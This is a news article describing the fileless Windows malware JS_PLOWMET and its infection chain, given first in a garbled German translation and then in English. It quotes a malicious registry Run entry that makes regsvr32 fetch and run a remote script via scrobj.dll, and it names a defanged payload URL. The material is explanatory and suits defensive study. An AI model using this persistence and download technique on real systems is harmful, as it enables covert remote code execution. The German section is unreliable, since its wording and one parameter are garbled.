CYBER NEWS

JS_PLOWMET Dateilos Windows-Malware rückstandslos von Intrusion

Als Cyber-Kriminelle werden zunehmend anspruchsvoll und innovativ in ihren kriminellen Bemühungen, die neue dateilose JS_PLOWMET Malware wird es immer schwieriger für Sicherheitsexperten die Malware zu verfolgen und zu lokalisieren, wenn ein Einbruch stattfindet. Die Malware wird berichtet, daher auf der Maschine keine Spur ihrer Existenz hinterlassen so dass es schwieriger für Experten seinen Inhalt zu analysieren.

Natur und Lieferung von JS_PLOWMET

Der Windows-Malware wurde vor kurzem von Cyber-Experten entdeckt und sagte eine End-to-End-dateilose Infektionskette verfügen, wird schwieriger es bedeutet, eine Sandbox zu analysieren mit. Experten sagen, der spezifische Trojaner auf dem System des Benutzers über die Auto-Start-Registrierungsprozedur ankommt. Weiter, die Malware installiert sich auf der Festplatte, ohne eine gut sichtbare Spur ihrer Existenz auf der Maschine zu verlassen. Es wird geschätzt, dass fast 90% des JS_PLOWMET Infektionen sind in der Asien-Pazifik-Region basiert.

ähnliche Geschichte: Dateilose Malware Plagues 140 Banken in 40 Länder

Für jetzt, es ist unklar, der genaue Methode der JS_PLOWMET wird das System eines Benutzers übertragen auf. Jedoch, es ist sehr wahrscheinlich, dass die Malware als XML-Datei heruntergeladen wird, enthält schädliche JavaScript weitergegeben über den Auto-Start-Registrierungseintrag. Es ist sehr wahrscheinlich, dass die meisten Infektionen durch entweder den Besuch bösartige Websites oder Malware-Dropper auftreten.

Ohne Zweifel ist das Konzept des Malware dateilose ein schlauer Ansatz auf der Seite der Cyber-Kriminellen und obwohl es vielleicht ein seltenes Ereignis sein, solche Konzepte sind nicht fremd, die Cyber-Community. Erst die Malware „SOREBRECT“ dateilosen wurde von Experten um Anfang Juni entdeckt 2017, solche Angriffe dürften allmählich häufiger wachsen, möglicherweise verbreitet. Für die Mehrheit der Malware dateilose, ihre unauffindbar Natur kann insofern nicht verfolgt werden, da sie das System eines Benutzers eingeben, von dort auf ihre Präsenz im Allgemeinen offenbart, wenn die Malware seinen Zweck führt. Das Problem liegt darin, dass, während die meisten Malware-dateilose offenbaren sich nach ihrer bösartigen Nutzlast Ausführung, JS_PLOWMET ist die Ausnahme in diesem Fall.

JS_PLOWMET Unter genauerem Hinsehen

Experten haben es, dass durch die Zeit deutlich gemacht, JS_PLOWMET Malware heruntergeladen, die folgenden Registrierungs bereits geändert wurde:

HKEY_CURRENT_USER Software Microsoft Windows Currentversion Run
COM + = „regsvr32 / s / a / u / i:{bösartige URL, Downloads JS_POWMET} scrobj.dll“

Die Beschreibungen der folgenden Parameter verwendet, von „regsvr32“ sind, wie folgt:

  1. /s = silent Option für regsvr32
  2. /n = sagt regsvr32 nicht DllRegisterServer zu verwenden
  3. /u = Unregister Server / object
  4. /i = verwendet einen optionalen Parameter für die Weitergabe (dh. URL) zu DllInstall
  5. scrobj.dll = Microsoft Script Component Runtime

In ihrer Art der Ausführung, die JS_PLOWMET Trojan leitet eine URL regsvr32 (Microsoft Register Server) als Parameter, im Wesentlichen zwingende regsvr32 die Datei auf der URL befindet sich zum Download. So, regsvr32 wird, um erleichtert auf beliebige Skripte auszuführen, ohne dass auf der Maschine die XML-Datei zu speichern, die. Effektiv, immer dann, wenn die Maschine in Bewegung setzt, es wird automatisch die bösartige Datei von ihrem Befehl herunterladen & Steuerung (C&C) Server.

Sobald das JS_PLOWMET Malware ausgeführt, eine andere Datei als TROJ_PSINJECT bekannt heruntergeladen - ein Powershell-Skript, was wiederum zu einer Website verbindet in sich eine andere Datei herunterzuladen namens „favicon“:

hxxps://bogerando[.]ru / Favicon

Die „Favicon“ Datei danach entschlüsselt und in seinen funktionalen Prozess mit ReflectivePELoader initiiert - verwendet, um Dateien zum Injizieren EXE / DLL.

Es ist vorteilhaft, bei dem Malware-Code aus einer engeren Perspektive zu betrachten, um adäquat zu seinen Funktionen zu erkennen. Starten, die Malware enthält Base64 String, die durch den RC4-Schlüssel in betroffenen dekodiert und entschlüsselt werden. Die Nachkommen dieser Entschlüsselung werden eine GZIP-komprimierte Zeichenfolge sein, die von der Malware selbst mithilfe der GZIP-Dekomprimierung Routine dekomprimiert. Schließlich, dies bringt uns den Codes für die ReflectivePELoader Funktion der Entfaltung, die verwendet wird, um die entschlüsselten heruntergeladene Datei zu laden.

Andererseits, Favicon wird auch die gleichen RC4-Schlüssel entschlüsselt werden unter Verwendung von, in der Tat, was zu der bösartigen DLL-Datei mit dem Namen BKDR_ANDROM. Die Datei wird nicht auf dem Gerät gespeichert werden, vielmehr wird es in den powershell.exe Prozess injiziert werden. Experten sagen, dieser Teil des Prozesses ist auch dateilose. in Wirklichkeit, alle diese Routinen werden von der Malware mit Powershell-Befehle ausgeführt.


TROJ_PSINJECT Code deobfuscation Prozess zeigt.

Was als nächstes geschieht, wird das powershell.exe von BKDR_ANDROM beendet werden, wenn sie auch in der Lage zu finden ist in dem System ausgeführt wird die folgenden Informationen von der Maschine zu sammeln:

  • Root-Volume-Seriennummer.
  • Betriebssystemversion.
  • Lokale IP-Adresse.
  • Administratorrechte.

Die JS_POWMET würde schließlich in Registry-Einträge in das Betriebssystem, um hinzuzufügen, um sicherzustellen, führt immer während des Anlaufs. Weiter, der Base64-kodiert Powershell-Befehl ist in der Lage durch den Auto-Start-Registrierungseintrag decodiert werden, die wiederum verwendet werden, um die verschlüsselten binären Daten zu entschlüsseln, die in dem böswilligen Codes von BKDR_ANDROM führen. Der Prozess von dort beteiligt bleibt ziemlich einfach; nachdem die Entschlüsselung abgeschlossen, es wird dann die entschlüsselten bösartigen Codes ausführen.

ähnliche Geschichte: TrickBot Banking Trojan Updated, WannaCry-Inspired Module nun aktiv

Abschluss

Abschließend, während Experten sagen, dass JS_POWMET und der Rest der Dateien, die mit ihm heruntergeladen werden, ist relativ leicht in Bezug auf Schäden, die, die Malware selbst zeigt die Längen Cyber-Kriminelle würden und erkannt und ihre Malware zerpflückt und analysiert, um zu vermeiden, gehen wird,. Cyber ​​Security ist ein kontinuierlich und ständig weiterentwickelnden Bereich der Möglichkeiten und relativ seltener Infektion Methoden, bei denen Malware ist dateilosen keine Ausnahme von diesem Paradigma. Während es schwierig sein kann, um sie angemessen für dateilosen Malware-Attacken in der Zukunft aufgrund ihrer Schwierigkeiten bereiten schnell genug erkannt wird, Experten empfehlen, sich in zu deaktivieren Powershell selbst die Auswirkungen zu mildern zu helfen JS_POWMET und die Vielzahl von Nutzlasten mit ihm enthaltenen.

Kristian Iliev

Kristian Iliev

Zweites Jahr Student an der University of Edinburgh studiert Ethnologie und Sozialpolitik. Avid-Enthusiasten von etwas damit zu tun, Filme und Uhrenreparaturen.

Mehr Beiträge

Schreibe einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Frist ist erschöpft. Bitte laden CAPTCHA.

Auf Facebook teilen Teilen
Loading ...
Empfehlen über Twitter Tweet
Loading ...
Share on Google Plus Teilen
Loading ...
Share on Linkedin Teilen
Loading ...
Empfehlen über Digg Teilen
Teilen auf Reddit Teilen
Loading ...
Empfehlen über Stumbleupon Teilen
Loading ...

CYBER NEWS

JS_PLOWMET Fileless Windows Malware Leaves No Trace of Intrusion

As cybercriminals become progressively sophisticated and innovative in their criminal endeavours, the new fileless JS_PLOWMET malware makes it increasingly difficult for security experts to trace and locate the malware when an intrusion occurs. The malware is reported to leave no trace of its existence on the machine hence making it harder for experts to analyze its contents.

Nature and Delivery of JS_PLOWMET

The Windows malware was recently spotted by cybersecurity experts and said to feature an end-to-end fileless infection chain, meaning it will be more difficult to analyse using a sandbox. Experts say the specific Trojan arrives on a user’s system via the auto-start registry procedure. Furthermore, the malware installs itself on the hard drive without leaving a readily visible trace of its existence on the machine. It is estimated that nearly 90% of the JS_PLOWMET infections are based in the Asia-Pacific region.

Related Story: Fileless Malware Plagues 140 Banks Across 40 Countries

As of yet, it is unclear of the exact method the JS_PLOWMET is transferred on to a user’s system. However, it is most likely that the malware is downloaded as an XML file containing malicious JavaScript passed on via the auto-start registry entry. It is most likely that most infections occur due to either visiting malicious websites or malware droppers.

Without a doubt the concept of fileless malware is a cunning approach on the side of cybercriminals and although it might be a rare occurrence, such concepts are not alien to the cybersecurity community. As recently as the “SOREBRECT” fileless malware was discovered by experts around early June 2017, such attacks are expected to gradually grow more common, potentially become widespread. For the majority of fileless malware, their untraceable nature cannot be tracked insofar as they enter a user’s system, from there on their presence is generally revealed once the malware executes its purpose. The issue lies in the fact that whilst most fileless malware reveal themselves after executing their malicious payload, JS_PLOWMET is the exception in this case.

JS_PLOWMET Under a Closer Inspection

Experts have made it clear that by the time JS_PLOWMET malware is downloaded, the following registry has already been changed:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

The descriptions of the following parameters used by “regsvr32” are as follows:

  1. /s = silent option for regsvr32
  2. /n = tells regsvr32 not to use DllRegisterServer
  3. /u = Unregister server/object
  4. /i = used for passing an optional parameter (ie. URL) to DLLinstall
  5. scrobj.dll = Microsoft’s Script Component Runtime

In its method of execution, the JS_PLOWMET Trojan relays an URL to regsvr32 (Microsoft register server) as a parameter, essentially compelling regsvr32 to download the file located on the URL. Thus, regsvr32 is facilitated in order to execute arbitrary scripts without having to save the XML file on the machine. Effectively, whenever the machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server.

Once the JS_PLOWMET malware is executed, a different file known as TROJ_PSINJECT is downloaded – a Powershell script, which in turn connects to a website in itself downloading another file called “favicon”:

hxxps://bogerando[.]ru/favicon

The “favicon” file is thereafter decrypted and initiated into its functional process using ReflectivePELoader – used for injecting EXE/DLL files.

It is beneficial to look at the malware code from a closer perspective in order to adequately discern its functions. To start off, the malware contains Base64 String that will in effected be decoded and decrypted by the RC4 key. The offspring of this decryption will be a GZIP-compressed string that is decompressed by the malware itself by using the GZIP-decompression routine. Finally, this brings us to the unfolding of the codes for the ReflectivePELoader function that will be used to load the decrypted downloaded file.

On the other hand, Favicon will also be decrypted using the very same RC4 key, in effect resulting in the malicious DLL file by the name of BKDR_ANDROM. The file will not be saved onto the machine, rather it will be injected into the powershell.exe process. Experts say this part of the process is also fileless. In effect, all of these routines are executed by the malware using PowerShell commands.


TROJ_PSINJECT code showing deobfuscation process.

What happens next is that powershell.exe will be terminated by BKDR_ANDROM if it is found running in the system as well as being able to gather the following information from the machine:

  • Root Volume Serial Number.
  • Operating System Version.
  • Local IP Address.
  • Administrator Privileges.

The JS_POWMET would eventually add in registry entries into the operating system in order to ensure it always executes during start-up. Furthermore, the Base64-encoded PowerShell command is able to be decoded by the auto-start registry entry, which in turn will be used to decrypt the encrypted binary data that will result in the malicious codes of BKDR_ANDROM. The process involved from there on remains pretty simple; after the decryption is finalised, it will then execute the decrypted malicious codes.

Related Story: TrickBot Banking Trojan Updated, WannaCry-Inspired Module Now Active

Conclusion

In conclusion, while experts say that JS_POWMET and the rest of the files that are downloaded with it are relatively light in terms of damage caused, the malware itself demonstrates the lengths cybercriminals would and will go to avoid being detected and their malware picked apart and analysed. Cybersecurity is a continuously and ever-evolving realm of possibilities and relatively uncommon infection methods involving fileless malware are no exception to this paradigm. While it may be hard to adequately prepare ourselves for fileless malware attacks in the future due to their difficulty of being detected quickly enough, experts recommend looking into disabling Powershell itself to help mitigate the effects of JS_POWMET and the multiplicity of payloads included with it.

Kristian Iliev

Kristian Iliev

Second year student at The University of Edinburgh studying Social Anthropology and Social Policy. Avid enthusiast of anything to do with IT, films and watch repairs.

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...